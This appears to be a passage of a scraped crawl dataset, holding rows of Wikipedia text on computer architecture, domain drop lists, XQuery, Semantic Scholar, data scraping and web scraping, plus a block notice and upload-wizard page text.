There are many types of computer architectures: Of all these abstract machines, a quantum computer holds the most promise for revolutionizing computing. 132 Logic gates are a common abstraction which can apply to most of the above digital or analog paradigms. The ability to store and execute lists of instructions called programs makes computers extremely versatile, distinguishing them from calculators. The Church Turing thesis is a mathematical statement of this versatility: any computer with a minimum capability (being Turing-complete) is, in principle, capable of performing the same tasks that any other computer can perform. Therefore, any type of computer (netbook, supercomputer, cellular automaton, etc.) is able to perform the same computational tasks, given enough time and storage capacity. A computer will solve problems in exactly the way it is programmed to, without regard to efficiency, alternative solutions, possible shortcuts, or possible errors in the code. Computer programs that learn and adapt are part of the emerging field of artificial intelligence and machine learning. Artificial intelligence based products generally fall into two major categories: rule-based systems and pattern recognition systems. Rule-based systems attempt to represent the rules used by human experts and tend to be expensive to develop. Pattern-based systems use data about a problem to generate conclusions. Examples of pattern-based systems include voice recognition, font recognition, translation and the emerging field of on-line marketing. As the use of computers has spread throughout society, there are an increasing number of careers involving computers. The need for computers to work well together and to be able to exchange information has spawned the need for many standards organizations, clubs and societies of both a formal and informal nature. |
501 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Domain_name_drop_list | A domain name drop list is a list containing the expired domain names that could be deleted from the domain name registry in the near future. These lists are typically used by domainers to locate expiring domain names with value. There is no defined date range for data contained with a drop list, as they can contain anywhere between 1 day's worth of expiring domain names, to 30 or more days worth. Some drop lists contain only domain names that follow the domain name deletion process (where the domain name enters the REGISTRAR-HOLD status, followed by REDEMPTIONPERIOD, and PENDINGDELETE), some contain only pre-release domain names, and some contain both pre-release and regular domain names. The data contained within a drop list can also vary, with some lists providing only basic information, such as the domain name and its expiry date. Other drop lists provide more detailed statistics, including, among others, PageRank, Link popularity and Alexa rank. Critics say that promotion and marketing of so-called droplists may encourage cybercrime and payoffs at registrars, indicating that a registrants can lose their domains without abandon. When a domain name is abandoned, or the period of validity is not renewed (expires), the webhost and registrar then action a "deletion" (the drop). Once a domain name has been deleted from the internet, it ceases to exist. Anyone may then register that name (the catch). The process of re-registering expired names is known as dropcatching and various domain name registries have differing views on it. 1 Sometimes, people get locked out of their email and cannot reply to the renew request (or otherwise obstructed or hacked), and their domainname may be deleted and offered as available. This Internet domain name article is a stub. You can help Wikipedia by expanding it. |
502 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Special:QrCode&url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FData_scraping | The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Main Page. |
503 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:File_upload_wizard | Thank you for offering to contribute an image or other media file for use on Wikipedia. This wizard will guide you through a questionnaire prompting you for the appropriate copyright and sourcing information for each file. Please ensure you understand copyright and the image use policy before proceeding. Uploads to Wikimedia Commons Upload a non-free file Uploads locally to the English Wikipedia; must comply with the non-free content criteria You do not have JavaScript enabled Sorry, in order to use this uploading script, JavaScript must be enabled. You can still use the plain Special:Upload page to upload files to the English Wikipedia without JavaScript. You are not currently logged in. Sorry, in order to use this uploading script and to upload files, you need to be logged in with your named account. Please log in and then try again. Your account has not become confirmed yet. Sorry, in order to upload files on the English Wikipedia, you need to have a confirmed account. Normally, your account will become confirmed automatically once you have made 10 edits and four days have passed since you created it. You may already be able to upload files on the Wikimedia Commons, but you can't do it on the English Wikipedia just yet. If the file you want to upload has a free license, please go to Commons and upload it there. Important note: if you don't want to wait until you are autoconfirmed, you may ask somebody else to upload a file for you at Wikipedia:Files for upload. In very rare cases an administrator may make your account confirmed manually through a request at Wikipedia:Requests for permissions Confirmed. Sorry, a few special characters and character combinations cannot be used in the filename for technical reasons. This goes especially for : and . Your filename has been modified to avoid these. Please check if it is okay now. The filename you chose seems to be very short, or overly generic. Please don't use: A file of this name already exists on Commons If you upload your file with this name, you will be masking the existing file and make it inaccessible. Your new file will be displayed everywhere the existing file was previously used. This should not be done, except in very rare exceptional cases. Please don't upload your file under this name, unless you seriously know what you are doing. Choose a different name for your new file instead. A file of this name already exists. If you upload your file with this name, you will be overwriting the existing file. Your new file will be displayed everywhere the existing file was previously used. Please don't do this, unless you have a good reason to: It is very important that you read through the following options and questions, and provide all required information truthfully and carefully. Thank you for offering to upload a free work. Wikipedia loves free files. However, we would love it even more if you uploaded them on our sister project, the Wikimedia Commons. Files uploaded on Commons can be used immediately here on Wikipedia as well as on all its sister projects. Uploading files on Commons works just the same as here. Your Wikipedia account will automatically work on Commons too. Please consider uploading your file on Commons. However, if you prefer to do it here instead, you may go ahead with this form. You can also first use this form to collect the information about your file and then send it to Commons from here. Please note that by "entirely self-made" we really mean just that. Do not use this section for any of the following: Editors who falsely declare such items as their "own work" will be blocked from editing. Use this only if there is an explicit licensing statement in the source. The website must explicitly say that the image is released under a license that allows free re-use for any purpose, e.g. the Creative Commons Attribution license. You must be able to point exactly to where it says this. If the source website doesn't say so explicitly, please do not upload the file. Public Domain means that nobody owns any copyrights on this work. It does not mean simply that it is freely viewable somewhere on the web or that it has been widely used by others. This is not for images you simply found somewhere on the web. Most images on the web are under copyright and belong to somebody, even if you believe the owner won't care about that copyright. If it is in the public domain, you must be able to point to an actual law that makes it so. If you can't point to such a law but merely found this image somewhere, then please do not upload it. Please remember that you will need to demonstrate that: This file will be used in the following article: Enter the name of exactly one Wikipedia article, without the ... brackets and without the "http: en.wikipedia.org ... URL code. It has to be an actual article, not a talkpage, template, user page, etc. If you plan to use the file in more than one article, please name only one of them here. Then, after uploading, open the image description page for editing and add your separate explanations for each additional article manually. Example article okay. This article doesn't exist The article Example could not be found. Please check the spelling, and make sure you enter the name of an existing article in which you will include this file. If this is an article you are only planning to write, please write it first and upload the file afterwards. This is not an actual encyclopedia article The page Example is not in the main article namespace. Non-free files can only be used in mainspace article pages, not on a user page, talk page, template, etc. Please upload this file only if it is going to be used in an actual article. If this page is an article draft in your user space, we're sorry, but we must ask you to wait until the page is ready and has been moved into mainspace, and only upload the file after that. This is a disambiguation page The page Example is not a real article, but a disambiguation page pointing to a number of other pages. Please check and enter the exact title of the actual target article you meant. If neither of these two statements applies, then please do not upload this image. This section is not for images used merely to illustrate an article about a person or thing, showing what that person or thing look like. In view of this, please explain how the use of this file will be minimal. Well, we're very sorry, but if you're not sure about this file's copyright status, or if it doesn't fit into any of the groups above, then: Please don't upload it. Really, please don't. Even if you think it would make for a great addition to an article. We really take these copyright rules very seriously on Wikipedia. Note that media is assumed to be fully-copyrighted unless shown otherwise; the burden is on the uploader. In particular, please don't upload: If you are in any doubt, please ask some experienced editors for advice before uploading. People will be happy to assist you at Wikipedia:Media copyright questions. Thank you. This is the data that will be submitted to upload: Your file is being uploaded. This might take a minute or two, depending on the size of the file and the speed of your internet connection. Once uploading is completed, you will find your new file at this link: File:Example.jpg Your file has been uploaded successfully and can now be found here: File:Example.jpg Please follow the link and check that the image description page has all the information you meant to include. If you want to change the description, just go to the image page, click the "edit" tab at the top of the page and edit just as you would edit any other page. Do not go through this upload form again, unless you want to replace the actual file with a new version. To insert this file into an article, you may want to use code similar to the following: If you wish to make a link to the file in text, without actually showing the image, for instance when discussing the image on a talk page, you can use the following (mark the : after the initial brackets ): See Wikipedia:Picture tutorial for more detailed help on how to insert and position images in pages. Thank you for using the File Upload Wizard.Please leave your feedback, comments, bug reports or suggestions on the talk page. |
504 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/XQuery | XQuery (XML Query) is a query and functional programming language that queries and transforms collections of structured and unstructured data, usually in the form of XML, text and with vendor-specific extensions for other data formats (JSON, binary, etc.). The language is developed by the XML Query working group of the W3C. The work is closely coordinated with the development of XSLT by the XSL Working Group; the two groups share responsibility for XPath, which is a subset of XQuery. XQuery 1.0 became a W3C Recommendation on January 23, 2007. 4 XQuery 3.0 became a W3C Recommendation on April 8, 2014. 5 XQuery 3.1 became a W3C Recommendation on March 21, 2017. 6 "The mission of the XML Query project is to provide flexible query facilities to extract data from real and virtual documents on the World Wide Web, therefore finally providing the needed interaction between the Web world and the database world. Ultimately, collections of XML files will be accessed like databases. 7 XQuery is a functional, side effect-free, expression-oriented programming language with a simple type system, summed up by Kilpel inen: 8 All XQuery expressions operate on sequences, and evaluate to sequences. Sequences are ordered lists of items. Items can be either nodes, which represent components of XML documents, or atomic values, which are instances of XML Schema base types like xs:integer or xs:string. Sequences can also be empty, or consist of a single item only. No distinction is made between a single item and a singleton sequence. (...) XQuery XPath sequences differ from lists in languages like Lisp and Prolog by excluding nested sequences. Designers of XQuery may have considered nested sequences unnecessary for the manipulation of document contents. Nesting, or hierarchy of document structures is instead represented by nodes and their child-parent relationships XQuery provides the means to extract and manipulate data from XML documents or any data source that can be viewed as XML, such as relational databases 9 or office documents. XQuery contains a superset of XPath expression syntax to address specific parts of an XML document. It supplements this with a SQL-like "FLWOR expression" for performing joins. A FLWOR expression is constructed from the five clauses after which it is named: FOR, LET, WHERE, ORDER BY, RETURN. The language also provides syntax allowing new XML documents to be constructed. Where the element and attribute names are known in advance, an XML-like syntax can be used; in other cases, expressions referred to as dynamic node constructors are available. All these constructs are defined as expressions within the language, and can be arbitrarily nested. The language is based on the XQuery and XPath Data Model (XDM) which uses a tree-structured model of the information content of an XML document, containing seven kinds of nodes: document nodes, elements, attributes, text nodes, comments, processing instructions, and namespaces. XDM also models all values as sequences (a singleton value is considered to be a sequence of length one). The items in a sequence can either be XML nodes or atomic values. Atomic values may be integers, strings, booleans, and so on: the full list of types is based on the primitive types defined in XML Schema. Features for updating XML documents or databases, and full text search capability, are not part of the core language, but are defined in add-on extension standards: XQuery Update Facility 1.0 supports update feature and XQuery and XPath Full Text 1.0 supports full text search in XML documents. XQuery 3.0 adds support for full functional programming, in that functions are values that can be manipulated (stored in variables, passed to higher-order functions, and dynamically called). The sample XQuery code below lists the unique speakers in each act of Shakespeare's play Hamlet, encoded in hamlet.xml All XQuery constructs for performing computations are expressions. There are no statements, even though some of the keywords appear to suggest statement-like behaviors. To execute a function, the expression within the body is evaluated and its value is returned. Thus to write a function to double an input value, one simply writes: To write a full query saying 'Hello World', one writes the expression: This style is common in functional programming languages. Below are a few examples of how XQuery can be used: Although XQuery was initially conceived as a query language for large collections of XML documents, it is also capable of transforming individual documents. As such, its capabilities overlap with XSLT, which was designed expressly to allow input XML documents to be transformed into HTML or other formats. The XSLT 2.0 and XQuery standards were developed by separate working groups within W3C, working together to ensure a common approach where appropriate. They share the same data model (XDM), type system, and function library, and both include XPath 2.0 as a sublanguage. The two languages, however, are rooted in different traditions and serve the needs of different communities. XSLT was primarily conceived as a stylesheet language whose primary goal was to render XML for the human reader on screen, on the web (as web template language), or on paper. XQuery was primarily conceived as a database query language in the tradition of SQL. Because the two languages originate in different communities, XSLT is stronger according to whom? in its handling of narrative documents with more flexible structure, while XQuery is stronger in its data handling (for example, when performing relational joins). XSLT 1.0 appeared as a Recommendation in 1999, whereas XQuery 1.0 only became a Recommendation in early 2007; as a result, XSLT is still much more widely used. Both languages have similar expressive power, though XSLT 2.0 has many features that are missing from XQuery 1.0, such as grouping, number and date formatting, and greater control over XML namespaces. 10 11 12 Many of these features were planned for XQuery 3.0. 13 Any comparison must take into account the version of XSLT. XSLT 1.0 and XSLT 2.0 are very different languages. XSLT 2.0, in particular, has been heavily influenced by XQuery in its move to strong typing and schema-awareness. Usability studies have shown that XQuery is easier to learn than XSLT, especially for users with previous experience of database languages such as SQL. 14 This can be attributed to the fact that XQuery is a smaller language with fewer concepts to learn, and to the fact that programs are more concise. It is also true that XQuery is more orthogonal, in that any expression can be used in any syntactic context. By contrast, XSLT is a two-language system in which XPath expressions can be nested in XSLT instructions but not vice versa. XSLT is currently stronger than XQuery for applications that involve making small changes to a document (for example, deleting all the NOTE elements). Such applications are generally handled in XSLT by use of a coding pattern that involves an identity template that copies all nodes unchanged, modified by specific templates that modify selected nodes. XQuery has no equivalent to this coding pattern, though in future versions it will be possible to tackle such problems using the update facilities in the language that are under development. 15 XQuery 1.0 lacked any kind of mechanism for dynamic binding or polymorphism; this has been remedied with the introduction of functions as first-class values in XQuery 3.0. The absence of this capability starts to become noticeable when writing large applications, or when writing code that is designed to be reusable in different environments. citation needed XSLT offers two complementary mechanisms in this area: the dynamic matching of template rules, and the ability to override rules using xsl:import, that make it possible to write applications with multiple customization layers. The absence of these facilities from XQuery 1.0 was a deliberate design decision: it has the consequence that XQuery is very amenable to static analysis, which is essential to achieve the level of optimization needed in database query languages. This also makes it easier to detect errors in XQuery code at compile time. The fact that XSLT 2.0 uses XML syntax makes it rather verbose in comparison to XQuery 1.0. However, many large applications take advantage of this capability by using XSLT to read, write, or modify stylesheets dynamically as part of a processing pipeline. The use of XML syntax also enables the use of XML-based tools for managing XSLT code. By contrast, XQuery syntax is more suitable for embedding in traditional programming languages such as Java (see XQuery API for Java) or C . If necessary, XQuery code can also be expressed in an XML syntax called XQueryX. The XQueryX representation of XQuery code is rather verbose and not convenient for humans, but can easily be processed with XML tools, for example transformed with XSLT stylesheets. 16 17 Two major extensions to the XQuery were developed by the W3C: Both reached Recommendation status as extensions to XQuery 1.0, but work on taking them forward to work with XQuery 3.0 was abandoned for lack of resources. Work on XQuery 3.0 was published as a Recommendation on 8 April 2014, 19 and XQuery 3.1 is a Recommendation as at February 2017. A scripting (procedural) extension for XQuery was designed, but never completed. 20 21 The EXPath Community Group 22 develops extensions to XQuery and other related standards (XPath, XSLT, XProc, and XForms). The following extensions are currently available: JSONiq is an extension of XQuery that adds support to extract and transform data from JSON documents. JSONiq is a superset of XQuery 3.0. It is published under the Creative Commons Attribution-ShareAlike 3.0 license. The EXQuery 27 project develops standards around creating portable XQuery applications. The following standards are currently available: |
505 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/S2CID_(identifier) | Semantic Scholar is a research tool for scientific literature powered by artificial intelligence. It is developed at the Allen Institute for AI and was publicly released in November 2015. 2 Semantic Scholar uses modern techniques in natural language processing to support the research process, for example by providing automatically generated summaries of scholarly papers. 3 The Semantic Scholar team is actively researching the use of artificial intelligence in natural language processing, machine learning, human computer interaction, and information retrieval. 4 Semantic Scholar began as a database for the topics of computer science, geoscience, and neuroscience. 5 In 2017, the system began including biomedical literature in its corpus. 5 As of September 2022 update , it includes over 200 million publications from all fields of science. 6 Semantic Scholar provides a one-sentence summary of scientific literature. One of its aims was to address the challenge of reading numerous titles and lengthy abstracts on mobile devices. 7 It also seeks to ensure that the three million scientific papers published yearly reach readers, since it is estimated that only half of this literature is ever read. 8 Artificial intelligence is used to capture the essence of a paper, generating it through an "abstractive" technique. 3 The project uses a combination of machine learning, natural language processing, and machine vision to add a layer of semantic analysis to the traditional methods of citation analysis, and to extract relevant figures, tables, entities, and venues from papers. 9 10 Another key AI-powered feature is Research Feeds, an adaptive research recommender that uses AI to quickly learn what papers users care about reading and recommends the latest research to help scholars stay up to date. It uses a state-of-the-art paper embedding model trained using contrastive learning to find papers similar to those in each Library folder. 11 Semantic Scholar also offers Semantic Reader, an augmented reader with the potential to revolutionize scientific reading by making it more accessible and richly contextual. 12 Semantic Reader provides in-line citation cards that allow users to see citations with TLDR summaries as they read and skimming highlights that capture key points of a paper so users can digest faster. In contrast with Google Scholar and PubMed, Semantic Scholar is designed to highlight the most important and influential elements of a paper. 13 The AI technology is designed to identify hidden connections and links between research topics. 14 Like the previously cited search engines, Semantic Scholar also exploits graph structures, which include the Microsoft Academic Knowledge Graph, Springer Nature's SciGraph, and the Semantic Scholar Corpus (originally a 45 million papers corpus in computer science, neuroscience and biomedicine). 15 16 Each paper hosted by Semantic Scholar is assigned a unique identifier called the Semantic Scholar Corpus ID (abbreviated S2CID). The following entry is an example: Liu, Ying; Gayle, Albert A; Wilder-Smith, Annelies; Rockl v, Joacim (March 2020). "The reproductive number of COVID 19 is higher compared to SARS coronavirus". Journal of Travel Medicine. 27 (2). doi:10.1093 jtm taaa021. PMID 32052846. S2CID 211099356. Semantic Scholar is free to use and unlike similar search engines (i.e. Google Scholar) does not search for material that is behind a paywall. 5 citation needed One study compared the index scope of Semantic Scholar to Google Scholar, and found that for the papers cited by secondary studies in computer science, the two indices had comparable coverage, each only missing a handful of the papers. 17 As of January 2018, following a 2017 project that added biomedical papers and topic summaries, the Semantic Scholar corpus included more than 40 million papers from computer science and biomedicine. 18 In March 2018, Doug Raymond, who developed machine learning initiatives for the Amazon Alexa platform, was hired to lead the Semantic Scholar project. 19 As of August 2019 update , the number of included papers metadata (not the actual PDFs) had grown to more than 173 million 20 after the addition of the Microsoft Academic Graph records. 21 In 2020, a partnership between Semantic Scholar and the University of Chicago Press Journals made all articles published under the University of Chicago Press available in the Semantic Scholar corpus. 22 At the end of 2020, Semantic Scholar had indexed 190 million papers. 23 In 2020, Semantic Scholar reached seven million users per month. 7 |
506 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-1 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
507 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-13 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to 